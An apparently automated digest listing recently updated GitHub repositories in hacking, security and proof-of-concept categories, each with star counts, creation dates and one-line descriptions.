dead-hosts updated The-Big-List-of-Hacked-Malware-Web-Sites_git_mitchellkrogza. This repo has 6 stars and 2 watchers. This repo was created on 2018-01-10. --- Test of https://github.com/mitchellkrogza/The-Big-List-of-Hacked-Malware-Web-Sites

carlospolop updated hacktricks. This repo has 1744 stars and 99 watchers. This repo was created on 2020-07-15. --- Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.

YasserGersy updated cazador_unr. This repo has 95 stars and 7 watchers. This repo was created on 2019-06-22. --- Hacking tools

Tejas1510 updated Hacking-Scripts. This repo has 31 stars and 0 watchers. This repo was created on 2020-11-05. --- Hacking Scripts contains amazing and awesome scripts written in Python, JavaScript, Java, Nodejs, and more. The main aim of the repository will be to provide utility scripts that might make everyday life easy.

PoorGameDev updated CSI-Hacking. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- Impress all your "friends" with this fake CSI hacking look-alike...

becored updated RM6_Prac. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-20. --- Rockman 6 (Mega Man 6) practice rom hack for speedrun.

clempat updated enhanced-hackernews. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-23. --- This is THE Best hacker news reader

thaone5866 updated cavehacks-public-release-a-cavegame-hack-. This repo has 1 stars and 1 watchers. This repo was created on 2021-01-19. --- it's the cavegame.io hack!

ujshaw updated Hardware-Hacking. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- None

Gabriel-Cervo updated 100DaysOfSwift-Project2. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- Second project in "Hacking With Swift - 100 Days of Swift" course

babbadeckl updated HackTheBox-Writeups. This repo has 0 stars and 1 watchers. This repo was created on 2020-12-31. --- Writeups for Hack The Box machines/challenges

NicolasMuras updated SH4R1NG4N. This repo has 1 stars and 1 watchers. This repo was created on 2020-03-22. --- Platform of ethical hacking tools, info gathering and database management.

avinashkranjan updated Recess. This repo has 0 stars and 1 watchers. This repo was created on 2020-09-05. --- 🚀 MLH- First Day Back Hacks Hackathon... 🤓 Recess - A Social Media Platform for students to share their experience/knowledge they gained in their free time. 🧐

Faelian updated Formation-CAD170. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- Supports et notes pour la formation Hacking niveau 1 - CAD 170

danielebruneo updated remarkable2-hacks. This repo has 8 stars and 2 watchers. This repo was created on 2021-01-25. --- A collection of hacks, mods, tools, tips & tricks, specifically focused on the Remarkable 2

aigars-github updated blacklist. This repo has 0 stars and 1 watchers. This repo was created on 2020-10-24. --- IP's from which scanning, spaming or hacking attempts detected

Roboy updated esp-wheelchair. This repo has 0 stars and 2 watchers. This repo was created on 2020-12-05. --- Wireless control hack for the Roboy wheelchair

w1th0ut updated red-ocean. This repo has 1 stars and 0 watchers. This repo was created on 2019-05-18. --- This is my first program, for simple hacking activity, made by simple python2 code, hope you enjoy :)

Jinseop-Sim updated Web-Hacking-Study. This repo has 1 stars and 1 watchers. This repo was created on 2021-01-08. --- None

dwvicy updated hack. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-23. --- hack.dscrait.tech

dannieldev updated Fundamentos-de-React. This repo has 0 stars and 1 watchers. This repo was created on 2020-07-03. --- 🚀Ejercicios de React.js desde Cero Hasta Pro.. Hacker.. Master

----Security Updates----

forward3d updated garrison. This repo has 22 stars and 11 watchers. This repo was created on 2018-06-12. --- Security, Compliance and Informational Dashboard System

mozilla updated foundation-security-advisories. This repo has 12 stars and 21 watchers. This repo was created on 2014-07-03. --- Canonical source for Mozilla Foundation Security Advisories. http://www.mozilla.org/security/announce/

linux-mailinglist-archives updated linux-security-module.vger.kernel.org.0. This repo has 0 stars and 0 watchers. This repo was created on 2019-07-01. --- None

EvgeniyMay updated spring-security-accout-system. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- Spring security account system

staaankey updated PasswordSecurity. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- None

OpenCTI-Platform updated opencti. This repo has 1485 stars and 87 watchers. This repo was created on 2018-12-17. --- Open Cyber Threat Intelligence Platform

ZestProjects updated linux. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-26. --- Zest Projects' fork of the Linux kernel. Full LLVM build support is included with patches for features such as Zero Stack Initialisation and Polly, along with improvements to performance and security.

pucherot updated Pi.Alert. This repo has 124 stars and 14 watchers. This repo was created on 2021-01-05. --- WIFI / LAN intruder detector. Check the devices connected and alert you with unknown devices. It also warns of the disconnection of "always connected" devices

arkime updated arkime. This repo has 4586 stars and 362 watchers. This repo was created on 2012-07-06. --- Arkime (formerly Moloch) is an open source, large scale, full packet capturing, indexing, and database system.

JavaGarcia updated Neanet. This repo has 3 stars and 1 watchers. This repo was created on 2020-08-02. --- Threat intelligence

insidersec updated insider. This repo has 189 stars and 11 watchers. This repo was created on 2019-11-12. --- Static Application Security Testing (SAST) engine focused on covering the OWASP Top 10, to make source code analysis to find vulnerabilities right in the source code, focused on a agile and easy to implement software inside your DevOps pipeline. Support the following technologies: Java (Maven and Android), Kotlin (Android), Swift (iOS), .NET Full Framework, C#, and Javascript (Node.js).

complexorganizations updated wireguard-manager. This repo has 343 stars and 25 watchers. This repo was created on 2020-04-14. --- ✔️ Self-hosted Wireguard Manager

Mixeway updated MixewayFrontend. This repo has 4 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is security orchestrator for vulnerability scanners which enable easy plug in integration with CICD pipelines. MixewayFrontend contains source code of GUI created in Angular 8 and based on ngxadmin framework.

jainara1012 updated security_plus. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-15. --- None

Mixeway updated MixewayBackend. This repo has 8 stars and 3 watchers. This repo was created on 2019-11-29. --- Mixeway is security orchestrator for vulnerability scanners which enable easy plug in integration with CICD pipelines. MixewayBackend project contains source code of backend with all plugin integrations writer in Spring Boot.

SHolzhauer updated elastic-tip. This repo has 11 stars and 3 watchers. This repo was created on 2020-10-10. --- Elastic TIP is a python tool which automates the process of aggregating Threat Intelligence and ingesting the intelligence into a common format into Elasticsearch with the main goal of being used by the Security solution.

Hack23 updated securityfixerbot. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-18. --- None

vituperative updated i2pplus. This repo has 1 stars and 1 watchers. This repo was created on 2020-06-12. --- I2P+ is a soft-fork of the Java I2P Anonymizing Network Layer - this is a mirror of https://gitlab.com/i2pplus/I2P.Plus/

OpenZeppelin updated openzeppelin-contracts. This repo has 9049 stars and 470 watchers. This repo was created on 2016-08-01. --- OpenZeppelin Contracts is a library for secure smart contract development.

github updated codeql. This repo has 1947 stars and 81 watchers. This repo was created on 2018-07-31. --- CodeQL: the libraries and queries that power security researchers around the world, as well as code scanning in GitHub Advanced Security (code scanning), LGTM.com, and LGTM Enterprise

leonlatsch updated Photok. This repo has 41 stars and 7 watchers. This repo was created on 2020-08-12. --- Encrypted Photo Safe for Android

secman-team updated secman. This repo has 1 stars and 1 watchers. This repo was created on 2020-12-27. --- secman is a password manager built by go

TankerHQ updated sdk-native. This repo has 15 stars and 7 watchers. This repo was created on 2018-12-03. --- Tanker C++ / C encryption SDK

Skyscanner updated cfripper. This repo has 258 stars and 10 watchers. This repo was created on 2018-07-02. --- Library and CLI tool for analysing CloudFormation templates and check them for security compliance.

I3anx updated M183_Wildi_Orakci_Backend. This repo has 1 stars and 2 watchers. This repo was created on 2020-12-02. --- Security Application for Modul 183 gibb

----PoC Updates----

codesandtags updated poc-blog. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- This is a Proof of Concept, about how to create microservices using NodeJS, Express and React. This project contains a monorepo which represents the microservices to manage a blog website.

kevcodez updated gotrue-kt. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-24. --- Kotlin Client for GoTrue API (Proof of concept/WIP)

sweetpi updated node-module-compiler. This repo has 0 stars and 2 watchers. This repo was created on 2015-02-11. --- Some proof of concept stuff for cross compiling npm modules

pantherNZ updated GameChallenge. This repo has 0 stars and 1 watchers. This repo was created on 2020-06-05. --- Ultimate Game Challenge - Prototype / Demo / Proof of Concept

lemaitre updated dsurcu. This repo has 0 stars and 1 watchers. This repo was created on 2020-12-14. --- Proof of Concept for a Dead-Simple Userspace Read-Copy-Update implementation.

swiss-territorial-data-lab updated regbl-poc-analysis. This repo has 0 stars and 0 watchers. This repo was created on 2021-01-21. --- Analysis script and tools for the proof of concept for the Registry of building (RegBL) completion

Ch-sriram updated node-js-deno. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- Proof of Concept: NodeJS & Deno. Repository contains concepts and code related to Node JS [Vanilla Node, Express Framework, REST APIs, GraphQL, Websockets & more] & Deno.

dinosaure updated paf-le-chien. This repo has 12 stars and 3 watchers. This repo was created on 2020-02-02. --- Port of HTTP/AF with Mirage and Tuyau (Proof Of Concept)

abaplint updated transpiler. This repo has 20 stars and 6 watchers. This repo was created on 2020-02-26. --- Proof of Concept - Very much work in progress

uma-email updated poc. This repo has 0 stars and 1 watchers. This repo was created on 2020-09-28. --- A proof of concept Authorization-Enhanced Mail System

swissarmysam updated signal-nui. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- A proof-of-concept natural user interface (NUI) using hand gestures and voice to control a video streaming website.

ajiniesta updated multiemail. This repo has 0 stars and 1 watchers. This repo was created on 2015-11-24. --- Proof of Concept for emailing in JavaFX 8

jwilk updated docbook-xsl-mitm. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-25. --- proof-of-concept mitmproxy script to infect DocBook XSL stylesheets

toop6iho updated toop6iho.github.io. This repo has 0 stars and 0 watchers. This repo was created on 2020-10-01. --- Subdomain Takeover Proof of Concept Site

Immueggpain updated forwardproto. This repo has 2 stars and 3 watchers. This repo was created on 2018-08-14. --- A naive forwarding protocol. This is a proof of concept (PoC).

gokulprathin8 updated vanilla-redux-poc. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- React-Redux Proof of Concept.

joshuajung updated 116117bot. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-26. --- A proof of concept bot, checking impfterminservice.de for available COVID-19 vaccination appointments.

contriteobserver updated RajawaliAssimpBridge. This repo has 0 stars and 1 watchers. This repo was created on 2020-11-19. --- A proof of concept integration between Rajawali and the Open Asset (Assimp) Import Library

EticaAI updated HXL-Data-Science-file-formats. This repo has 2 stars and 2 watchers. This repo was created on 2021-01-24. --- [public draft][Proof of concept] Common file formats used for Data Science exported from HXL (The Humanitarian Exchange Language)

bjmcternan updated autonav_proof_of_concept. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-22. --- None

matale14 updated Writeups. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-07. --- All my writeups. CTF's, Proof of Concepts, Projects.

Monkatraz updated mainframe. This repo has 0 stars and 1 watchers. This repo was created on 2020-10-01. --- An unofficial proof-of-concept for the SCP-Wiki.

jzohdi updated image-upload-poc. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-10. --- This is a proof of concept project where a user will be able to create an image gallery accepting real time image uploads.

ascent12 updated wlx. This repo has 1 stars and 2 watchers. This repo was created on 2021-01-25. --- Proof-of-concept Wayland Compositor Library

ryanlsmith142 updated service-dog-registry. This repo has 0 stars and 1 watchers. This repo was created on 2021-01-04. --- A proof of concept built with the MERN stack.